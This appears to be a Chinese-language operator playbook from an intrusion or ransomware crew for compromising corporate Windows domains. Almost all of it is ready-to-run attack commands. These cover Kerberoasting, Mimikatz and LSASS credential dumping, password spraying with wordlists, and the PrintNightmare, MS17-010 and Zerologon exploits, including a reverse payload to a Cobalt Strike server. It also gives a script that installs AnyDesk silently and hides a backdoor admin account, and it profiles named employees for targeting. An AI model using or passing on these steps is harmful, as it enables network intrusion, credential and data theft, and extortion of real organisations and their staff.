权限提升和信息收集
初步侦查
1.1搜索公司收入
找到公司网站 在Google上搜索:公司名称 + 收入 (mycorporation.com + revenue) (“mycorporation.com” “revenue”) 检查超过1个网站,如果可能的话 (owler, manta, zoominfo, dnb, rocketrich)
1.2. 确定管理员和用户
1.3. shell whoami <===== 我是谁
1.4. shell whoami /groups --> 我的权限(如果机器人来自蓝色屏幕)
1.5.1. shell nltest /dclist: <===== 域控制器 net dclist <===== 域控制器
1.5.2. net domain_controllers <===== 这个命令将显示域控制器的IP地址
1.6. shell net localgroup administrators <===== 本地管理员
1.7. shell net group /domain “Domain Admins” <===== 域管理员
1.8. shell net group “Enterprise Admins” /domain <===== 企业管理员
1.9. shell net group “Domain Computers” /domain <===== 域内计算机总数
1.10. net computers <===== ping所有主机,并显示IP地址。
接下来我们根据获得的信息进行行动,例如,如果有3000台设备,最好先执行Kerberoast攻击,因为在两个小时内,机器在抓取共享文件时可能会掉线等。
网络共享资源获取
共享资源获取的两种情况:
当我们寻找可以放置有效载荷的位置时。在这种情况下,我们只需要具有写入权限的共享资源(即,管理员共享但没有读取权限的共享)。为此,我们可以执行:
powershell-import /home/user/work/ShareFinder.ps1
psinject 1234 x64 Invoke-ShareFinder -CheckAdmin -Verbose | Out-File -Encoding ascii C:\ProgramData\sh.txt
当我们寻找将在第二阶段提取的信息时,此时需要具有读取权限的共享资源。我们使用域管理员的令牌来启动数据提取(不同的管理员可能有不同的共享访问权限),并使用以下命令获取共享资源:
powershell-import /home/user/work/ShareFinder.ps1
psinject 5209 x64 Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\ProgramData\shda.txt
接下来,研究获取到的共享资源,我们关注的内容包括:
财务文件
会计资料
IT相关文件
客户信息
项目资料
具体取决于我们的目标关注的内容。然后,我们将提取筛选出的数据,详细信息将在第二部分中说明。
Kerberoast攻击
目标是获取管理员的哈希值,以便后续进行暴力破解.
方法一:
powershell-import /home/user/work/Invoke-Kerberoast.ps1
psinject 4728 x64 Invoke-Kerberoast -OutputFormat HashCat | fl | Out-File -FilePath c:\ProgramData\pshashes.txt -append -force -Encoding UTF8
方法二:
execute-assembly /home/user/work/Rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\ProgramData\hashes.txt
execute-assembly /home/user/work/Rubeus.exe asreproast /format:hashcat /outfile:C:\ProgramData\asrephashes.txt
最终在 C:\ProgramData\
目录中生成的文件中可能包含哈希值,下载这些文件,并在成功的情况下将哈希值发送给团队领导进行暴力破解。
Mimikatz
从内存中提取明文密码
privilege::debug
– 检查是否具备相应权限。log nameoflog.log
– 启动日志记录功能。sekurlsa::logonpasswords
– 输出存储在计算机上的所有密码,以明文形式显示。
基本命令
privilege::debug
sekurlsa::logonpasswords
token::elevate
lsadump::sam
从域控制器同步哈希
lsadump::dcsync /user:Administrator -pass [密码]
sekurlsa::pth /user:[用户名] /domain:[域] /ntlm:[哈希] /run:cmd
在 Cobalt Strike 中使用 Mimikatz
getsystem
hashdump
logonpasswords
使用 Beacon
beacon> make_token domain\user password - 以用户的令牌身份运行
beacon> pth domain\user NTLM - 使用用户的 NTLM 哈希
beacon> rev2self - 还原会话到初始状态
beacon> dcsync domain.com - 从域中获取所有哈希(需要域管理员权限)
如果找到登录名和哈希:
pth Domain\Admin pass(以哈希形式)
shell dir \\ip或主机名\c$
示例:
EliAdmin:1001:aad3b435b51404eeaad3b435b51404ee:b0059c57f5249ede3db768e388ee0b14:::
pth ELC\EliAdmin b0059c57f5249ede3db768e388ee0b14
如果找到登录名和密码:
make_token Domain\Admin Pass
rev2self - 移除令牌
读取 LSASS
从 GitHub 下载 Mimikatz 最新版本。
以管理员身份打开 CMD
基本命令:
C:\work\mimikatz\win32 > mimiKatz
privilege::debug
sekurlsa::minidump lsass.dmp — 从转储文件中工作
log — 将输出记录到日志文件
保存的信息:
明文登录名和密码。
如果没有密码,保存 NTLM 和 SHA1(后续可解密或进行哈希攻击)。
Windows 2003 的 LSASS 转储
在 Windows 2003 上,无法通过任务管理器转储 lsass.exe。
打开“任务管理器”,选择“进程”,找到 lsass.exe,右键点击并选择“转储进程”。
转储文件位于:
C:\user\%%user%%\AppData\Local\Temp\lsass.DMP
。
下载转储的任意方式。
使用 Procdump
下载 procdump.exe 或 procdump64.exe。
运行命令
procdump.exe -acceptula -ma lsass.exe C:\compaq\lsass.dmp
procdump64.exe -acceptula -ma lsass.exe C:\compaq\lsass.dmp
3.下载 lsass.dmp 文件并删除 lsass.dmp 和 procdump。
Zerologon 利用
使用 Mimikatz 执行 Zerologon 攻击:
mimikatz lsadump::zerologon /target:[controller.domain.local] /account:[controller]$ /exploit
mimikatz lsadump::zerologon /target:DC01.contoso.com /account:DC01$ /exploit
Procdump 使用示例
在 Mimikatz 中使用 Procdump:
lsadump::mimidump LSAdump.dmp
log
sekurlsa::logonpasswords
exit
LSASS 提取方法
通过 Cobalt Strike
getsystem
使用以下命令创建 LSASS 转储((PID 是 lsass.exe 的进程 ID):
shell rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full
在远程机器上执行
使用 WMIC:
shell wmic /node:[target] process call create "cmd /c rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full"
使用 PsExec:
remote-exec psexec [target] cmd /c rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full
通过 RDP
打开任务管理器,找到 lsass 进程。
右键点击 lsass 进程,选择“创建转储文件”。
将生成的转储文件下载到本地计算机。
检查域组策略文件中的保存密码
execute-assembly /home/user/work/Net-GPPPassword.exe
没看懂。
SMB 自动暴力破解
输入数据
进行此攻击所需的输入仅为密码:
从 CharpChrome 浏览器中提取的密码
从 SeatBelt 提取的密码
在网络内部工作过程中提取的密码(如通过 Mimikatz)
其他发现的密码,例如在文件中记录的密码
如果提取的密码数量少于可以启动的暴力攻击数量,可以从以下常见企业密码列表中添加:
Password1
Hello123
password
Welcome1
banco@1
training
Password123
job12345
spring
food1234
还建议使用基于季节和当前年份的密码列表。考虑到密码每三个月更改一次,可以生成一个备用列表。例如,在 2020 年 8 月,可以创建如下列表:
June2020
July2020
August20
August2020
Summer20
Summer2020
June2020!
July2020!
August20!
August2020!
Summer20!
Summer2020!
这些密码符合 Active Directory 的三项或四项要求,通常足以供用户设置。
域管理员场景
收集域管理员列表:
shell net group "domain admins" /dom
将结果保存到 admins.txt
文件中。
将文件上传到主机的 C:\ProgramData
文件夹。
查询域账户锁定策略(防止暴力破解):
beacon> shell net accounts /dom
关注 Lockout threshold
参数,通常会有一个特定的数值,作为暴力破解的防护参数(本例中为 Never,意味着未启用保护)。
在脚本中指定域:
$context = new-object System.DirectoryServices.ActiveDirectory.DirectoryContext("Domain","shookconstruction.com")
导入并运行脚本:
powershell-import /home/user/work/scripts/Invoke-SMBAutoBrute.ps1
执行:
psinject 4728 x86 Invoke-SMBAutoBrute -PasswordList "Password1, Hello123, Welcome1, password, banco@1, training, Password123, spring, food1234, job12345, 1qazXDR%+"
如果未获得积极结果,可以在稍后时间重复尝试(建议在下一次尝试前将 Lockout duration
参数乘以二),使用新的密码列表。脚本结束时将通过 Beacon 输出消息。(还是蛮有耐心的
PrintNightmare (打印噩梦)
描述:
1.1https://github.com/calebstewart/CVE-2021-1675
这是一个新近曝光的漏洞,利用它可以创建本地管理员账户,非常有用,如果你获得了普通用户权限的代理。
在代理上进行以下操作:
导入脚本: 导入文件
CVE-2021-34527.ps1
powershell-import //导入文件 CVE-2021-34527.ps1
2.创建用户: 创建一个名为 HACKER
、密码为 FUCKER
的新用户,并将其添加到本地管理员组:
powershell Invoke-Nightmare -NewUser "HACKER" -NewPassword "FUCKER" -DriverName "Xeroxxx"
3.启动代理: 以新创建的本地管理员身份启动代理:
spawnas COMPNAME\HACKER FUCKER https //这里替换为监听器的名称
4.也有可能获得 SYSTEM 权限的代理,导入后执行:
Invoke-Nightmare -DLL "\polniy\put\do\payload.dll"
MS17-010
描述:
Windows XP 和 Windows 2003 没有 MS17-010 补丁。
Windows 7、8、10,2008、2012、2016 可能没有打补丁,因此可能存在漏洞。在攻击它们时,为了提高成功利用的几率,需要提供域用户的登录名和密码。
首先,获取 AD,ping 目标 IP 地址。
IP 地址应在一行中以空格分隔。
1. 在 Cobalt Strike 中启动代理:
在 Cobalt Strike 控制台输入命令:
socks 18585
2. 扫描是否存在漏洞:
在 Metasploit 控制台输入以下命令:
use auxiliary/scanner/smb/smb_ms17_010
set Proxies socks4: 172.98.192.214:18589
set threads 10
set RHOSTS 10.0.0.10 10.0.0.20 10.0.0.30 10.0.0.40
在攻击 Windows 7、8、10、2008、2012、2016 时,额外指定:
set smbuser 登录名
set smbdomain 域名
set smbpass 密码
然后运行:
run
说明:
auxiliary/scanner/smb/smb_ms17_010
— Metasploit 的辅助模块,扫描目标是否存在漏洞;set Proxies socks4: 172.98.192.214:18589
— 指定 Metasploit 使用代理访问目标网络;172.98.192.214
— Cobalt Strike 服务器的 IP;18589
— 端口;set threads 10
— 使用 10 个线程;set RHOSTS
— 所有目标 IP 地址,以空格分隔;run
— 启动模块。
结果:
[*] Scanned 10 of 44 hosts
[+] 10.0.0.200:445 - Host is VULNERABLE to… <== 漏洞主机
3. 利用漏洞获取 meterpreter 会话
使用以下命令:
use exploit/windows/smb/ms17_010_psexec
set Proxies socks4: 172.98.192.214:18589
set RHOSTS 10.0.0.10 10.0.0.20 10.0.0.30 10.0.0.40
set payload windows/meterpreter/bind_tcp
set verbose 1
run
如果会话未打开,则更改有效负载文件格式:
set target 1
run
set target 2
run
set target 3
run
更换有效负载,依次尝试打开会话不同格式的有效负载文件:
set payload windows/meterpreter/bind_tcp_rc4
也尝试所有文件格式。
如果还是不成功,尝试另一种方法,推送会话到 Cobalt Strike:
set payload windows/meterpreter/reverse_https
set lport 443
set lhost 172.98.192.214 (Cobalt Strike 的 IP)
再次尝试所有文件格式。
模块说明:
use exploit/windows/smb/ms17_010_psexec
— Metasploit 模块,向目标投送有效负载并打开会话;set payload windows/meterpreter/bind_tcp
— 指定使用的有效负载;target 1
是 ps1(在 Windows XP 和 Windows 2003 上 PowerShell 不工作,适用于较新版本的 Windows);target 2
是 exe;target 3
是 mof。
结果: 应该会出现会话。在 Metasploit 中可通过命令 sessions
进行检查。
获取会话后,尝试获取域管理员账号的登录名和密码: 进入会话,输入命令 sessions 1
(1 是会话编号):
getpid — 获取会话进程的 PID。如果有 PID,说明会话存活。
hashdump — 保存哈希值。
提取密码和哈希:
load mimikatz — 在目标上加载 mimikatz。
Wdigest - 尝试获取用户输入的密码;
kerberos - ?
livessp - ?
ssp - 通过 RDP 输入的密码;
tspkg - ?
background - 将会话转到后台(可通过 `sessions 1` 再次打开)。
如果会话无法成功获取,尝试创建管理员账号并通过 RDP 连接。
4. 利用漏洞执行命令(创建用户并将其添加到本地管理员组)
使用以下命令:
use auxiliary/admin/smb/ms17_010_command
set Proxies socks4: 172.98.192.214:18589
set RHOSTS 10.0.0.200 10.0.0.37 10.0.0.200 10.0.0.81
set command net user OldAdmin 1Q2w3E4r5T6y /add
set verbose 1
run
set command net localgroup Administrators OldAdmin /ADD
run
说明:
use auxiliary/admin/smb/ms17_010_command
— Metasploit 的辅助模块,使用管理员权限在目标上执行指定命令并将结果返回到 Metasploit 控制台;set command ...
— 指定要执行的命令;net user OldAdmin 1Q2w3E4r5T6y /add
— 创建用户;net localgroup Administrators OldAdmin /ADD
— 将用户添加到本地管理员组;set verbose 1
— 输出更详细的信息。如果某些操作失败,发送给更有经验的人。
结果: 指定的命令应该会成功执行。可以通过输出中的 The command completed successfully
来确认命令已成功执行。
然后通过 RDP 连接
选项 1 — 启动加密有效负载(可能获取会话)
简单地通过任何方式上传文件并执行。
选项 2 — 获取 lsass.exe 进程的转储并从中提取凭据。
有关如何操作,请参考 Mimikatz 的文档。
RouterScan
Zerologon
描述:
Zerologon 是一个利用 Windows 域控制器漏洞的工具,可以通过两种方式进行利用:
通过 Mimikatz。
通过 Cobalt Strike 中的脚本连接。
使用步骤:
下载脚本:
从以下链接下载 Zerologon 的脚本: ZeroLogon-BOF GitHub在 Cobalt Strike 中连接脚本:
像往常一样导入脚本,地址为:
ZeroLogon-BOF/dist/zerologon.cna
获取域名:
使用以下命令获取域名:
net domain
例如:domain.local
。
运行漏洞利用:
执行以下命令启动漏洞利用:
zerologon iunderstand domain.local
这里的 iunderstand
是一个停止词。利用此漏洞时会重置密码,这个操作可能导致域控制器功能受损,因此建议最后使用。
成功后处理:
如果成功,您将获得如下信息:
Success! Use pth .\\%S 31d6cfe0d16ae931b73c59d7e0c089c0 and run dcscync
进行 DCSync:
执行以下命令以同步域控制器:
dcsync domain.local
如果一切顺利,您将获得 NTDS 数据。
固定
在获得 SYSTEM 权限后,可以使用 AnyDesk 和 Atera 工具进行远程访问。
安装 AnyDesk
Function AnyDesk {
mkdir "C:\ProgramData\AnyDesk"
# 下载 AnyDesk
$clnt = new-object System.Net.WebClient
$url = "http://download.anydesk.com/AnyDesk.exe"
$file = "C:\ProgramData\AnyDesk.exe"
$clnt.DownloadFile($url, $file)
# 安装 AnyDesk
cmd.exe /c C:\ProgramData\AnyDesk.exe --install C:\ProgramData\AnyDesk --start-with-win --silent
# 设置密码
cmd.exe /c echo J9kzQ2Y0qO | C:\ProgramData\anydesk.exe --set-password
# 创建本地管理员账户
net user oldadministrator "qc69t4B#Z0kE3" /add
net localgroup Administrators oldadministrator /ADD
# 隐藏用户
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v oldadministrator /t REG_DWORD /d 0 /f
# 获取 AnyDesk ID
cmd.exe /c C:\ProgramData\AnyDesk.exe --get-id
}
AnyDesk
使用说明
在 PowerShell ISE 中以管理员身份运行上述代码。
获取并保存 AnyDesk ID。
在另一台机器(如独立服务器、VPS 或虚拟机)上下载 AnyDesk,输入刚才保存的 ID。
选择 Console Account,输入密码:J9kzQ2Y0qO
使用本地管理员或域账户登录,享受 AnyDesk 的便利。
固定Atera
Atera 的固定步骤
访问网站 https://app.atera.com。
注册账户。
点击页面顶部的“Install agent”(安装代理)。
下载代理并上传到机器人上。
启动代理:
shell УСТАНОВЩИК АГЕНТА.msi
6.在网站的“Devices”(设备)部分应该会显示访问权限。
7.删除代理安装程序。
最后的侦察
查找信任关系
shell nltest /domain_trusts /all_trus
提取 NTDS
查找备份(Backup)和网络附加存储(NAS,NetScan
猎取管理员
第一部分
询问域
beacon> shell net group "domain admins" /domain
任务已指派给 beacon:net group "domain admins" /domain
主机已回连,发送:64 字节
接收输出:
请求将在 DOMAIN.com 域的域控制器上处理。
组名 Domain Admins
备注 指定的域管理员
成员
----------------------------------------------------------------
Administrator ClusterSvc createch
Createch2 d01adm da9adm
p01adm PMPUser q01adm
repl s01adm Sapserviced01
SAPServiceDA9 sapservicep01 SAPServiceQ01
sapservices01 SAPServiceSND SAPServiceSOL
services services2 sndadm
soladm somadm staseb
telnet Johnadm
命令成功完成。
查看输出,筛选出服务账户和非服务账户。
上面列出的服务账户包括:
SAPServiceDA9
services
telnet
services2
Sapservice01 ...
哪些账户最有可能适合我们:
staseb
Johnadm
将它们记录下来。
可以查看它们在 adfind_persons.txt
中的身份,或使用命令:
shell net user staseb /domain
例如:
beacon> shell net user ebernardo /domain
任务已指派给 beacon:net user ebernardo /domain
主机已回连,发送:57 字节
接收输出:
用户名 ebernardo
全名 Eric Bernardo
备注
用户的备注
国家/地区代码 (null)
账户激活 是
账户到期 从不
上次密码设置 2020-12-08 12:05:15 PM
密码到期 2021-06-06 12:05:15 PM
密码可更改 2020-12-08 12:05:15 PM
密码要求 是
用户可以更改密码 是
允许的工作站 全部
登录脚本
用户配置
主目录
上次登录 2021-01-29 2:25:24 PM
允许的登录时间 全部
本地组成员资格 *Administrators *Remote Desktop Users
*Server Operators
全局组成员资格 *US Users *Great Plains Users
*Citrix Group *VPN Users Saskatoon
*Admins - AD Basic *VPNUsersHeadOffice
*Executives *All Winnipeg Staff
*Scribe Console Users *Domain Admins
*VPN Users USA *Workstation.admins
*Domain Users
命令成功完成。
查看谁是这个账户,属于多个组,备注列中有时会写明其身份,例如工程师、系统管理员、支持人员或业务顾问。
在“上次登录”中,账户应为活跃状态——即“上次登录”是在今天、昨天或本周,而不是一年前或“从不”。
如果在询问后仍不清楚其身份,请查看 adfind
并检查 LinkedIn(下文有相关部分)。
通过这种方式,从域管理员中筛选出 2-3 个账户,询问每个账户并了解他们的身份。最终应该能找到 1-2-3 个可能的管理员账户。
我们变成家庭分析师 - 查看 Adfind。
我们关注的是 adfind_groups
文件。
进入后,看到大量文本。
按下 Ctrl + F(Notepad2 / Geany),输入:
dn:CN=
然后点击“在当前文档中查找所有”。
输出大致如下(我剪切了一部分,仅保留了 5 行,通常这里有 100 到 10000 行):
adfind_groups:3752: dn:CN=SQLServer2005SQLBrowserUser$TRUCAMTLDC,CN=Users,DC=domain,DC=com
adfind_groups:3775: dn:CN=clubsocial,CN=Users,DC=domain,DC=com
adfind_groups:3800: dn:CN=Signature Intl-Special,OU=Groupes,OU=Infra,DC=domain,DC=com
adfind_groups:3829: dn:CN=FIMSyncAdmins,CN=Users,DC=domain,DC=com
adfind_groups:3852: dn:CN=GRP-GRAPHISTE,OU=FG-GRP,DC=domain,DC=com
因此,我们提取了 Active Directory 的组。
我们感兴趣的是什么,以及为什么要这样做——在 Active Directory 中一切都是结构化的,在美国和欧盟网络中,一切都做得尽可能清晰透明,有注释、标记、说明等等。
我们关注的是从事 IT、管理和局域网工程的组。
通过搜索,我们找到以下行:
adfind_groups:3877: dn:CN=IT,CN=Users,DC=domain,DC=com
我们在 adfind_Groups.txt
中查看第 3877 行,看到如下内容:
dn:CN=IT,CN=Users,DC=domain,DC=com
>objectClass: top
>objectClass: group
>cn: IT
>description: Informatique
>member: CN=MS Surface,OU=IT,DC=domain,DC=com
>member: CN=Gyslain Petit,OU=IT,DC=domain,DC=com
>member: CN=ftp,CN=Users,DC=domain,DC=com
>member: CN=St-Amand\, Sebastien\, CDT,OU=IT,DC=domain,DC=com
用户 ftp 和 MS Surface 被忽略,而 Gyslain Petit 和 St Amand Sebastien 则被纳入考虑。
接下来,打开 ad_users.txt
,输入 Gyslain Petit,找到用户的以下信息:
dn:CN=Gyslain Petit,OU=IT,DC=trudeaucorp,DC=com
>objectClass: top
>objectClass: person
>objectClass: organizationalPerson
>objectClass: user
>cn: Gyslain Petit
>sn: Petit
>title: Directeur, technologie de l'information
>physicalDeliveryOfficeName: 217
>givenName: Gyslain
>distinguishedName: CN=Gyslain Petit,OU=IT,DC=trudeaucorp,DC=com
>instanceType: 4
>whenCreated: 20020323153742.0Z
>whenChanged: 20201212071143.0Z
>displayName: Gyslain Petit
>uSNCreated: 29943
>memberOf: CN=GRP_Public_USA_P,OU=Securite-GRP,DC=trudeaucorp,DC=com
>memberOf: CN=GRP-LDAP-VPN,OU=FG-GRP,DC=trudeaucorp,DC=com
>memberOf: CN=IT Support,CN=Users,DC=trudeaucorp,DC=com
>memberOf: CN=Directeurs,CN=Users,DC=trudeaucorp,DC=com
>memberOf: CN=GRP-IT,OU=FG-GRP,DC=trudeaucorp,DC=com
>memberOf: CN=Signature Canada,OU=Groupes,OU=Infra,DC=trudeaucorp,DC=com
>memberOf: CN=EDI,CN=Users,DC=trudeaucorp,DC=com
>memberOf: CN=IT,CN=Users,DC=trudeaucorp,DC=com
>memberOf: CN=TRUDEAU-MONTREAL,CN=Users,DC=trudeaucorp,DC=com
>memberOf: CN=everyone,CN=Users,DC=trudeaucorp,DC=com
>uSNChanged: 6908986
>department: IT Manager
查看标题,发现这是信息技术总监。似乎很理想,但总监不一定拥有密码,而某个系统管理员可能就有。
因此对第二个用户进行类似的操作。在自己的记录中做笔记,记录来自 adfind
的登录名(sAMAccountName)大致如下:
>sAMAccountName: gpetit
gpetit - IT 总监
staseb - 某某某
如果运气好,职位会直接写出来。在我的测试案例中,如下所示:
adfind_persons:280: >title: Responsable, logistique direct import
adfind_persons:1836: >title: Chef des services techniques
adfind_persons:1955: >title: Chef comptable
adfind_persons:4544: >title: Directeur, technologie de l'information
adfind_persons:6064: >title: Présidente
adfind_persons:6191: >title: Chargée de projets, mise en marché
adfind_persons:6285: >title: Directrice marketing
adfind_persons:6848: >title: Coordonnatrice à l'entretien
总监、技术经理、系统管理员、首席执行官、首席信息官、支持人员……
如果有任意一个有联系且还活着,直接在下面建立交互,并提及联系请求。
小结:
在寻找合适的管理员时,关注有效的账户,标记那些在 IT 部门工作、负责网络、安全和系统支持的账户,最理想的情况是能够直接与这些账户交互或在 LinkedIn 上联系。